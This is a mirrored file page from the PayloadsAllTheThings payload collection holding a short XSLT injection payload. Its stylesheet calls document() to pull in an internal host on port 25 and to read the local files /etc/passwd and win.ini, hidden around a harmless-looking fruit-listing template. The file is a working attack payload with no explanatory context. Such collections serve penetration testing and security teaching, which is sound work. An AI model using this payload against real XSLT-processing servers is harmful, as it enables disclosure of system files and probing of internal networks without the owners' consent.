mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
14 lines
No EOL
582 B
XML
14 lines
No EOL
582 B
XML
<?xml version="1.0" encoding="utf-8"?>
|
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
|
<xsl:template match="/fruits">
|
|
<xsl:copy-of select="document('http://172.16.132.1:25')"/>
|
|
<xsl:copy-of select="document('/etc/passwd')"/>
|
|
<xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
|
|
Fruits:
|
|
<!-- Loop for each fruit -->
|
|
<xsl:for-each select="fruit">
|
|
<!-- Print name: description -->
|
|
- <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
|
|
</xsl:for-each>
|
|
</xsl:template>
|
|
</xsl:stylesheet> |